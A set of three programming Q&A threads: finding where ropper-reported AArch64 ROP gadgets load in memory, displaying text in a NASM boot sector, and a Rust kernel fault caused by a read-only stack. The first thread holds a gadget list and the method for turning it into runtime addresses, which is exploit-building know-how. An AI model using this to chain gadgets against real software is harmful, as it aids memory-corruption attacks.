0x0000000000000648: bl #0x728; ldp x29, x30, [sp], #0x10; ret;
0x00000000000007e0: bl #0x740; movz w0, #0x1; strb w0, [x19, #0x48]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x000000000000087c: bl #0x83c; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x00000000000008ec: blr x3;
0x0000000000000768: br x16;
0x0000000000000768: br x16; ret;
0x0000000000000670: br x17;
0x0000000000000730: cbz x0, #0x738; b #0x6a0; ret;
0x0000000000000760: cbz x1, #0x76c; mov x16, x1; br x16;
0x0000000000000760: cbz x1, #0x76c; mov x16, x1; br x16; ret;
0x0000000000000790: cbz x1, #0x7a8; adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16;
0x000000000000079c: cbz x2, #0x7a8; mov x16, x2; br x16;
0x000000000000079c: cbz x2, #0x7a8; mov x16, x2; br x16; ret;
0x00000000000008f8: ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x00000000000008fc: ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x0000000000000900: ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x000000000000064c: ldp x29, x30, [sp], #0x10; ret;
0x00000000000007f0: ldp x29, x30, [sp], #0x20; ret;
0x0000000000000904: ldp x29, x30, [sp], #0x40; ret;
0x0000000000000864: ldp x29, x30, [sp], #0x60; ret;
0x000000000000072c: ldr x0, [x0, #0xfc8]; cbz x0, #0x738; b #0x6a0; ret;
0x000000000000075c: ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16;
0x000000000000075c: ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16; ret;
0x00000000000006a4: ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17;
0x00000000000006b4: ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17;
0x00000000000006c4: ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17;
0x00000000000006d4: ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17;
0x00000000000006e4: ldr x17, [x16, #0x30]; add x16, x16, #0x30; br x17;
0x0000000000000668: ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000694: ldr x17, [x16, #8]; add x16, x16, #8; br x17;
0x0000000000000684: ldr x17, [x16]; add x16, x16, #0; br x17;
0x00000000000007ec: ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000798: ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16;
0x0000000000000798: ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16; ret;
0x00000000000008d8: ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x00000000000008e8: mov w0, w22; blr x3;
0x00000000000008e4: mov x1, x23; mov w0, w22; blr x3;
0x0000000000000764: mov x16, x1; br x16;
0x0000000000000764: mov x16, x1; br x16; ret;
0x00000000000007a0: mov x16, x2; br x16;
0x00000000000007a0: mov x16, x2; br x16; ret;
0x00000000000008dc: mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x0000000000000644: mov x29, sp; bl #0x728; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000918: mov x29, sp; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000880: movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x00000000000007e4: movz w0, #0x1; strb w0, [x19, #0x48]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000660: stp x16, x30, [sp, #-0x10]!; adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000640: stp x29, x30, [sp, #-0x10]!; mov x29, sp; bl #0x728; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000914: stp x29, x30, [sp, #-0x10]!; mov x29, sp; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000874: str w0, [sp, #0x1c]; str x1, [sp, #0x10]; bl #0x83c; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000878: str x1, [sp, #0x10]; bl #0x83c; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x00000000000007e8: strb w0, [x19, #0x48]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x000000000000067c: nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x0000000000000830: nop; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000860: nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000678: nop; nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x000000000000090c: nop; ret;
0x0000000000000650: ret;
In particular i am interested in both 0x00000000000008f8 and 0x00000000000008d8 gadgets.
Elf file type is DYN (Shared object file)
Entry point 0x6f0
There are 9 program headers, starting at offset 64
The output of the command readelf -l to find the base address of ELF file is:
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040
0x00000000000001f8 0x00000000000001f8 R 0x8
INTERP 0x0000000000000238 0x0000000000000238 0x0000000000000238
0x000000000000001b 0x000000000000001b R 0x1
[Requesting program interpreter: /lib/ld-linux-aarch64.so.1]
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000adc 0x0000000000000adc R E 0x10000
LOAD 0x0000000000000db8 0x0000000000010db8 0x0000000000010db8
0x0000000000000290 0x0000000000000298 RW 0x10000
DYNAMIC 0x0000000000000dc8 0x0000000000010dc8 0x0000000000010dc8
0x00000000000001e0 0x00000000000001e0 RW 0x8
NOTE 0x0000000000000254 0x0000000000000254 0x0000000000000254
0x0000000000000044 0x0000000000000044 R 0x4
GNU_EH_FRAME 0x0000000000000960 0x0000000000000960 0x0000000000000960
0x0000000000000054 0x0000000000000054 R 0x4
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 0x10
GNU_RELRO 0x0000000000000db8 0x0000000000010db8 0x0000000000010db8
0x0000000000000248 0x0000000000000248 R 0x1
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
03 .init_array .fini_array .dynamic .got .got.plt .data .bss
04 .dynamic
05 .note.gnu.build-id .note.ABI-tag
06 .eh_frame_hdr
07
08 .init_array .fini_array .dynamic .got
and the output of the info proc mappings in gdb is:
Start Addr End Addr Size Offset objfile
0x5555555000 0x5555556000 0x1000 0x0 path_to _binary/binary_name
0x5555565000 0x5555566000 0x1000 0x0 path_to _binary/binary_name
0x5555566000 0x5555567000 0x1000 0x1000 path_to _binary/binary_name
0x7ff7e44000 0x7ff7fa1000 0x15d000 0x0 /usr/lib/aarch64-linux-gnu/libc-2.31.so
0x7ff7fa1000 0x7ff7fb1000 0x10000 0x15d000 /usr/lib/aarch64-linux-gnu/libc-2.31.so
0x7ff7fb1000 0x7ff7fb4000 0x3000 0x15d000 /usr/lib/aarch64-linux-gnu/libc-2.31.so
0x7ff7fb4000 0x7ff7fb7000 0x3000 0x160000 /usr/lib/aarch64-linux-gnu/libc-2.31.so
0x7ff7fb7000 0x7ff7fba000 0x3000 0x0
0x7ff7fcc000 0x7ff7fed000 0x21000 0x0 /usr/lib/aarch64-linux-gnu/ld-2.31.so
0x7ff7ff9000 0x7ff7ffb000 0x2000 0x0
0x7ff7ffb000 0x7ff7ffc000 0x1000 0x0 [vvar]
0x7ff7ffc000 0x7ff7ffd000 0x1000 0x0 [vdso]
0x7ff7ffd000 0x7ff7ffe000 0x1000 0x21000 /usr/lib/aarch64-linux-gnu/ld-2.31.so
0x7ff7ffe000 0x7ff8000000 0x2000 0x22000 /usr/lib/aarch64-linux-gnu/ld-2.31.so
0x7ffffdf000 0x8000000000 0x21000 0x0 [stack]
How can I find out where the gadgets are actually loaded in memory? Is that the issue? What exactly is ropper reporting?
Your gadget is at 0x55555558f8.
Ropper shows the addresses of gadgets the way the ELF header describes the memory layout of the binary. According to that header:
The file contents 0x0-0xadc are to be mapped as r-x at address 0x0.
The file contents 0xdb8-0x1048 are to be mapped as rw- at address 0x10db8.
Account for page boundaries and you get one page mapping file offset 0x0 to address 0x0 as executable and two pages mapping file offset 0x0 to address 0x10000 as writeable.
From your GDB dump, these mappings are created at 0x5555555000 and 0x5555565000 in the live process, respectively. A gadget that ropper lists at 0x8f8 therefore ends up at 0x5555555000 + 0x8f8 = 0x55555558f8.

Bootloader with text and graphics ...howto ?( with nasm )

Below I have code that draws 3 circles in 3 different colors; that works fine.
But how do I add (display) a text string? Thanks.
I did some tests on VirtualBox (Windows), but no luck.
Any ideas on how to get it working?
; 16-bit NASM program: switches to video mode 13h, draws three filled circles,
; waits for a key, then restores text mode and exits through int 21h.
; NOTE(review): ORG 100h and the int 21h exit are what a DOS .COM program uses, while
; the 510-byte padding and 0xAA55 signature at the end of the file are what a boot
; sector uses. A boot sector is normally loaded at 0000:7C00h with no DOS services
; available -- decide which of the two this file is meant to be.
BITS 16
ORG 100h
push 0a000h ;Video memory graphics segment
pop es ;ES = A000h; writePx stores pixels through [es:bx]
mov ax, 0013h ;AH=00h set video mode, AL=13h: 320x200 @ 8bpp
int 10h
push 0Eh ;Color index 0Eh (yellow in the default VGA palette)
push 10 ;cX
push 10 ;cY
push 10 ;Radius
call drawFilledCircle
push 02h ;Color index 02h (green in the default VGA palette)
push 40 ;cX
push 40 ;cY
push 30 ;Radius
call drawFilledCircle
push 06h ;Color index 06h (brown in the default VGA palette)
push 140 ;cX
push 100 ;cY
push 70 ;Radius
call drawFilledCircle
;Wait for a key
xor ah, ah
int 16h
; NOTE(review): nothing jumps over the string below, so after the key press the CPU
; runs straight into the bytes of "KERNEL IMG" and executes them as instructions.
; Move the data after the final int 21h (or jump over it).
loc db "KERNEL IMG"
; NOTE(review): this loop compares an 11-byte name at DS:SI with ES:DI and steps DI by
; 32 bytes, which looks like a directory-entry search taken from a loader. Neither CX
; (the loop count) nor DI is set up for it here, ES still points at video memory, and
; both branch targets are commented out, so it contributes nothing to the drawing.
.LOOP:
push cx
mov cx, 0x000B ; eleven character name (the string as written above is 10 bytes)
mov si, loc
; image name to find
push di
rep cmpsb ; test for entry match
pop di
;je LOAD_FAT
pop cx
add di, 0x0020 ; queue next directory entry
loop .LOOP
;jmp FAILURE
;Restore text mode
mov ax, 0003h ;AH=00h set video mode, AL=03h
int 10h
;Return
mov ax, 4c00h ;AH=4Ch, AL=00h
int 21h
;-----------------------------------------------------------------------
; drawFilledCircle - plot a filled disc one pixel at a time via writePx.
;
; Stack arguments, in push order (the routine pops all four: ret 08h):
;   Color   -> [bp+0Ah]
;   cX      -> [bp+08h]
;   cY      -> [bp+06h]
;   R       -> [bp+04h]
; Local:    [bp-02h] = R^2
; Clobbers: ax, bx, cx, dx, flags
;
; Every point (j, i) of the bounding square cX-R..cX+R x cY-R..cY+R is
; tested against (j-cX)^2 + (i-cY)^2 <= R^2. All arithmetic is 16-bit,
; so the squared distance only stays exact while 2*R^2 < 65536 (R <= 181).
;-----------------------------------------------------------------------
drawFilledCircle:
        push    bp
        mov     bp, sp
        sub     sp, 02h                 ; room for R^2

        mov     cx, WORD [bp+04h]       ; cx = R
        mov     ax, cx
        mul     ax                      ; ax = R^2 (dx is overwritten, not yet in use)
        mov     WORD [bp-02h], ax       ; [bp-02h] = R^2

        mov     ax, WORD [bp+06h]
        sub     ax, cx                  ; i = cY-R
        mov     bx, WORD [bp+08h]
        sub     bx, cx                  ; j = cX-R

        shl     cx, 1
        inc     cx                      ; 2R+1 points per side so that cX+R / cY+R
                                        ; are visited too (and R = 0 gives a count
                                        ; of 1 instead of a 65536-pass loop)
        mov     dx, cx                  ; dx = copy of the per-row count

.advance_v:
        push    cx                      ; save row counter
        push    bx                      ; save left-most j
        mov     cx, dx                  ; column counter for this row

.advance_h:
        ;Save values
        push    bx
        push    ax
        push    dx                      ; mul below overwrites dx

        ;Compute (i-y) and (j-x)
        sub     ax, WORD [bp+06h]
        sub     bx, WORD [bp+08h]

        mul     ax                      ; ax = (i-y)^2
        push    ax
        mov     ax, bx
        mul     ax                      ; ax = (j-x)^2
        pop     bx                      ; bx = (i-y)^2
        add     ax, bx                  ; (j-x)^2 + (i-y)^2
        cmp     ax, WORD [bp-02h]       ; compare against R^2

        ;Restore values before jump (pop does not touch the flags)
        pop     dx
        pop     ax
        pop     bx
        ja      .continue               ; skip pixel if distance^2 > R^2

        ;Write pixel
        push    WORD [bp+0ah]           ; Color
        push    bx                      ; X
        push    ax                      ; Y
        call    writePx

.continue:
        ;Advance j
        inc     bx
        loop    .advance_h

        ;Advance i
        inc     ax
        pop     bx                      ; restore j
        pop     cx                      ; restore row counter
        loop    .advance_v

        add     sp, 02h
        pop     bp
        ret     08h
;-----------------------------------------------------------------------
; writePx - store one pixel of the 320x200, 8 bpp frame buffer at es:0.
;
; Stack arguments, in push order (the routine pops all three: ret 06h):
;   Color   -> [bp+08h]  (low byte is written)
;   X       -> [bp+06h]
;   Y       -> [bp+04h]
; Requires: es = frame-buffer segment
; Preserves ax and bx; flags are modified.
;
; Coordinates outside 0..319 x 0..199 are clipped (nothing is written),
; so a shape that leaves the screen no longer wraps around into
; unrelated parts of video memory.
;-----------------------------------------------------------------------
SCREEN_WIDTH    equ     320
SCREEN_HEIGHT   equ     200

writePx:
        push    bp
        mov     bp, sp
        push    ax
        push    bx

        mov     bx, WORD [bp+04h]       ; bx = Y
        cmp     bx, SCREEN_HEIGHT
        jae     .done                   ; unsigned test also rejects negative Y
        mov     ax, WORD [bp+06h]       ; ax = X
        cmp     ax, SCREEN_WIDTH
        jae     .done                   ; unsigned test also rejects negative X

        mov     ax, bx
        shl     bx, 6                   ; Y*64
        shl     ax, 8                   ; Y*256
        add     bx, ax                  ; 320 = 256 + 64
        add     bx, WORD [bp+06h]       ; offset = Y*320 + X
        mov     ax, WORD [bp+08h]       ; al = color
        mov     BYTE [es:bx], al

.done:
        pop     bx
        pop     ax
        pop     bp
        ret     06h
; Pad the image with zeros up to offset 510 and append the two-byte
; boot-sector signature, giving a 512-byte output.
; NOTE(review): this listing is assembled with ORG 100h and terminates
; through int 21h, which are DOS .COM conventions - confirm whether a boot
; sector is really intended here.
times 510-($-$$) db 0 ; Fill the rest with zeros
dw 0xAA55 ; Boot loader signature
But how do I add a text string?
You've decided to use the 320x200 256 colors video mode 13h.
To output text you can use every BIOS function that deals with text output, just like you would do on a text video screen.
This video mode uses an 8x8 font and so you can position the cursor at any of the 40x25=1000 character cells.
Example of writing a red colored capital B at the center of the screen:
; Step 1: park the text cursor in the middle of the 40x25 character grid.
        mov     ah, 02h                 ; INT 10h function 02h: set cursor position
        mov     bh, 0                   ; display page 0
        mov     dh, 12                  ; row
        mov     dl, 20                  ; column
        int     10h                     ; video BIOS interrupt

; Step 2: print a capital B there through the teletype function.
        mov     ah, 0Eh                 ; INT 10h function 0Eh: teletype output
        mov     al, 'B'                 ; character code 66
        mov     bh, 0                   ; display page 0
        mov     bl, 0Ch                 ; color 12 = red
        int     10h                     ; video BIOS interrupt
BITS 16
[ORG 0x7C00]
;ORG 100h

;-----------------------------------------------------------------------
; Boot-sector entry point.
; Flow: set up segments/stack -> mode 13h -> three circles -> welcome text
;       -> wait for key -> fourth circle -> wait for key -> text mode -> halt.
; Code and data are kept apart so execution never runs into PutStr by
; fall-through and never decodes the strings as instructions.
;-----------------------------------------------------------------------
start:
        ; Do not rely on whatever segments/stack the firmware left behind.
        cli
        xor     ax, ax
        mov     ds, ax                  ; data is addressed as 0000:offset (matches ORG 0x7C00)
        mov     ss, ax
        mov     sp, 0x7C00              ; stack grows down from just below this sector
        sti
        cld                             ; lodsb / cmpsb must walk forward

        push    0a000h                  ; Video memory graphics segment
        pop     es
        mov     ax, 0013h               ; 320x200 @ 8bpp
        int     10h

        push    0Eh                     ; Color 0Eh (yellow in the default palette)
        push    10                      ; cX
        push    10                      ; cY
        push    10                      ; Radius
        call    drawFilledCircle

        push    02h                     ; Color 02h (green in the default palette)
        push    40                      ; cX
        push    40                      ; cY
        push    30                      ; Radius
        call    drawFilledCircle

        push    06h                     ; Color 06h (brown in the default palette)
        push    140                     ; cX
        push    100                     ; cY
        push    70                      ; Radius
        call    drawFilledCircle

main:                                   ; Label for the start of the main program
        mov     si, HelloWorld          ; ds:si -> zero-terminated string
        call    PutStr

        ;Wait for a key
        xor     ah, ah
        int     16h

        push    01h                     ; Color 01h (blue in the default palette)
        push    100                     ; cX
        push    90                      ; cY
        push    140                     ; Radius
        call    drawFilledCircle

        ; Directory-entry name scan (compares 11 bytes at es:di with loc,
        ; then steps di to the next 32-byte entry).
        ; NOTE(review): nothing in this listing points es:di at a directory
        ; buffer or loads cx with an entry count, and both match/fail
        ; branches are commented out - confirm what it is meant to search.
.LOOP:
        push    cx
        mov     cx, 0x000B              ; eleven character name
        mov     si, loc                 ; image name to find
        push    di
        repe cmpsb                      ; test for entry match
        pop     di
        ;je LOAD_FAT
        pop     cx
        add     di, 0x0020              ; queue next directory entry
        loop    .LOOP
        ;jmp FAILURE

        ;Wait for a key so the last circle stays visible before the mode switch
        xor     ah, ah
        int     16h

        ;Restore text mode
        mov     ax, 0003h
        int     10h

        ; There is no DOS underneath a boot sector, so int 21h/4C00h cannot
        ; be used to exit; park the CPU instead.
.halt:
        hlt
        jmp     .halt

;-----------------------------------------------------------------------
; PutStr - print a zero-terminated string with the BIOS teletype function.
; In:       ds:si -> string
; Clobbers: ax, bx, si, flags
;-----------------------------------------------------------------------
PutStr:
        mov     ah, 0x0E                ; The function to display a character (teletype)
        mov     bh, 0x00                ; Page number
        mov     bl, 0x07                ; Normal text attribute
.nextchar:
        lodsb                           ; al = [ds:si], si = si + 1
        or      al, al                  ; Sets the zero flag if al = 0
        jz      .return                 ; End of string reached
        int     0x10                    ; Run the BIOS video interrupt
        jmp     .nextchar               ; Loop back round to the top
.return:
        ret                             ; Return to main program

; Data
HelloWorld db ' WELCOME !! Press Enter ',10,10,0
; Padded to the 11 bytes the compare reads (8-character name + 3-character extension).
loc        db "KERNEL  IMG"
;-----------------------------------------------------------------------
; drawFilledCircle - plot a filled disc one pixel at a time via writePx.
;
; Stack arguments, in push order (the routine pops all four: ret 08h):
;   Color   -> [bp+0Ah]
;   cX      -> [bp+08h]
;   cY      -> [bp+06h]
;   R       -> [bp+04h]
; Local:    [bp-02h] = R^2
; Clobbers: ax, bx, cx, dx, flags
;
; Every point (j, i) of the bounding square cX-R..cX+R x cY-R..cY+R is
; tested against (j-cX)^2 + (i-cY)^2 <= R^2. All arithmetic is 16-bit,
; so the squared distance only stays exact while 2*R^2 < 65536 (R <= 181).
;-----------------------------------------------------------------------
drawFilledCircle:
        push    bp
        mov     bp, sp
        sub     sp, 02h                 ; room for R^2

        mov     cx, WORD [bp+04h]       ; cx = R
        mov     ax, cx
        mul     ax                      ; ax = R^2 (dx is overwritten, not yet in use)
        mov     WORD [bp-02h], ax       ; [bp-02h] = R^2

        mov     ax, WORD [bp+06h]
        sub     ax, cx                  ; i = cY-R
        mov     bx, WORD [bp+08h]
        sub     bx, cx                  ; j = cX-R

        shl     cx, 1
        inc     cx                      ; 2R+1 points per side so that cX+R / cY+R
                                        ; are visited too (and R = 0 gives a count
                                        ; of 1 instead of a 65536-pass loop)
        mov     dx, cx                  ; dx = copy of the per-row count

.advance_v:
        push    cx                      ; save row counter
        push    bx                      ; save left-most j
        mov     cx, dx                  ; column counter for this row

.advance_h:
        ;Save values
        push    bx
        push    ax
        push    dx                      ; mul below overwrites dx

        ;Compute (i-y) and (j-x)
        sub     ax, WORD [bp+06h]
        sub     bx, WORD [bp+08h]

        mul     ax                      ; ax = (i-y)^2
        push    ax
        mov     ax, bx
        mul     ax                      ; ax = (j-x)^2
        pop     bx                      ; bx = (i-y)^2
        add     ax, bx                  ; (j-x)^2 + (i-y)^2
        cmp     ax, WORD [bp-02h]       ; compare against R^2

        ;Restore values before jump (pop does not touch the flags)
        pop     dx
        pop     ax
        pop     bx
        ja      .continue               ; skip pixel if distance^2 > R^2

        ;Write pixel
        push    WORD [bp+0ah]           ; Color
        push    bx                      ; X
        push    ax                      ; Y
        call    writePx

.continue:
        ;Advance j
        inc     bx
        loop    .advance_h

        ;Advance i
        inc     ax
        pop     bx                      ; restore j
        pop     cx                      ; restore row counter
        loop    .advance_v

        add     sp, 02h
        pop     bp
        ret     08h
;-----------------------------------------------------------------------
; writePx - store one pixel of the 320x200, 8 bpp frame buffer at es:0.
;
; Stack arguments, in push order (the routine pops all three: ret 06h):
;   Color   -> [bp+08h]  (low byte is written)
;   X       -> [bp+06h]
;   Y       -> [bp+04h]
; Requires: es = frame-buffer segment
; Preserves ax and bx; flags are modified.
;
; Coordinates outside 0..319 x 0..199 are clipped (nothing is written),
; so a shape that leaves the screen no longer wraps around into
; unrelated parts of video memory.
;-----------------------------------------------------------------------
SCREEN_WIDTH    equ     320
SCREEN_HEIGHT   equ     200

writePx:
        push    bp
        mov     bp, sp
        push    ax
        push    bx

        mov     bx, WORD [bp+04h]       ; bx = Y
        cmp     bx, SCREEN_HEIGHT
        jae     .done                   ; unsigned test also rejects negative Y
        mov     ax, WORD [bp+06h]       ; ax = X
        cmp     ax, SCREEN_WIDTH
        jae     .done                   ; unsigned test also rejects negative X

        mov     ax, bx
        shl     bx, 6                   ; Y*64
        shl     ax, 8                   ; Y*256
        add     bx, ax                  ; 320 = 256 + 64
        add     bx, WORD [bp+06h]       ; offset = Y*320 + X
        mov     ax, WORD [bp+08h]       ; al = color
        mov     BYTE [es:bx], al

.done:
        pop     bx
        pop     ax
        pop     bp
        ret     06h
; Boot-sector trailer: zero-pad the image up to offset 510, then append
; the two-byte signature so the output is exactly 512 bytes.
times 510-($-$$) db 0 ; Fill the rest with zeros
dw 0xAA55 ; Boot loader signature

Rustc/LLVM generates faulty code for aarch64 with opt-level=0

I have two files which are assembled/compiled/linked into minimalistic kernel.
start.s:
/*
 * AArch64 boot stub (GNU as syntax).
 * Enables FP/SIMD access, points sp at the top of a static boot stack,
 * calls the Rust entry point __boot and then parks the CPU in __halt.
 */
.set CPACR_EL1_FPEN, 0b11 << 20
.set BOOT_STACK_SIZE, 8 * 1024

.global __boot_stack
.global __start
.global __halt

.bss
/*
 * 16-byte alignment is what sp needs. ".align 16" on this target means
 * 2^16 bytes, which pushed the stack out to a 64 KiB boundary.
 */
.balign 16
__boot_stack:
.skip BOOT_STACK_SIZE

.text
__start:
    /* disable FP and SIMD traps (CPACR_EL1.FPEN = 0b11) */
    mov x0, #CPACR_EL1_FPEN
    msr cpacr_el1, x0
    /* make the new CPACR_EL1 value take effect before any later instruction */
    isb

    /* set stack: sp = one past the end of __boot_stack, it grows downwards */
    adr x0, __boot_stack
    add sp, x0, #BOOT_STACK_SIZE

    /* call the Rust entry point */
    bl __boot

__halt:
    /* halt CPU: sleep until an interrupt, then go back to sleep */
    wfi
    b __halt
boot.rs:
/// Rust entry point, called from `__start` in start.s once the stack is set.
///
/// Writes a single `'!'` byte to the device register at `0x0900_0000`
/// (the serial port used by this kernel) and returns.
#[no_mangle]
pub extern "C" fn __boot() {
    // Address of the serial port's data register, as used by the original code.
    const SERIAL_PORT: *mut u8 = 0x0900_0000 as *mut u8;

    // A device register must be written with a volatile store so the compiler
    // can neither drop the access nor merge/reorder it with other accesses.
    unsafe {
        core::ptr::write_volatile(SERIAL_PORT, b'!');
    }
}
With opt-level=3 the resulting code outputs a single '!' to the serial port (as intended). With opt-level=0 I get a strange infinite loop (e.g. '!!!!!!!!!....'). Here is the disassembly of the problematic code:
0000000000000000 <__kernel_begin>:
0: d2a00600 mov x0, #0x300000 // #3145728
4: d5181040 msr cpacr_el1, x0
8: 100007c0 adr x0, 100 <__boot_stack>
c: 9140081f add sp, x0, #0x2, lsl #12
10: 94000003 bl 1c <__boot>
0000000000000014 <__halt>:
14: d503207f wfi
18: 17ffffff b 14 <__halt>
000000000000001c <__boot>:
1c: a9bf7bfd stp x29, x30, [sp,#-16]!
20: 910003fd mov x29, sp
24: 94000003 bl 30 <aarch64::boot::__boot::__rust_abi>
28: a8c17bfd ldp x29, x30, [sp],#16
2c: d65f03c0 ret
0000000000000030 <aarch64::boot::__boot::__rust_abi>:
30: d10043ff sub sp, sp, #0x10
34: 52a12008 mov w8, #0x9000000 // #150994944
38: 2a0803e9 mov w9, w8
3c: f90007e9 str x9, [sp,#8]
40: 52800428 mov w8, #0x21 // #33
44: 39000128 strb w8, [x9]
48: 910043ff add sp, sp, #0x10
4c: d65f03c0 ret
The code is tested using qemu-system-aarch64. I don't see serious problems with it (except redundancy). Can you suggest a possible cause of such abnormal behaviour?
P.S. This is the optimised version which works properly:
0000000000000000 <__kernel_begin>:
0: d2a00600 mov x0, #0x300000 // #3145728
4: d5181040 msr cpacr_el1, x0
8: 1007ffc0 adr x0, 10000 <__boot_stack>
c: 9140081f add sp, x0, #0x2, lsl #12
10: 94000003 bl 1c <__boot>
0000000000000014 <__halt>:
14: d503207f wfi
18: 17ffffff b 14 <__halt>
000000000000001c <__boot>:
1c: 52a12008 mov w8, #0x9000000 // #150994944
20: 52800429 mov w9, #0x21 // #33
24: 39000109 strb w9, [x8]
28: d65f03c0 ret
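I've managed to run the non-optimised code without abnormalities, thanks to Notlikethat for the idea: my stack was mapped into read-only memory. The unoptimised __boot saves x29/x30 on the stack (stp at 0x1c) and reloads them before returning (ldp at 0x28); when the store is silently dropped, the reloaded x30 is not the saved return address, so ret does not return to the caller (presumably it lands at address 0 and the kernel restarts, printing '!' again). The optimised build never touches the stack, which is why it worked.
So I added an offset statement to my linker script (". = 1024M;") so that all symbols start at 1 GiB (where RAM begins). After this modification the code works properly.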

Resources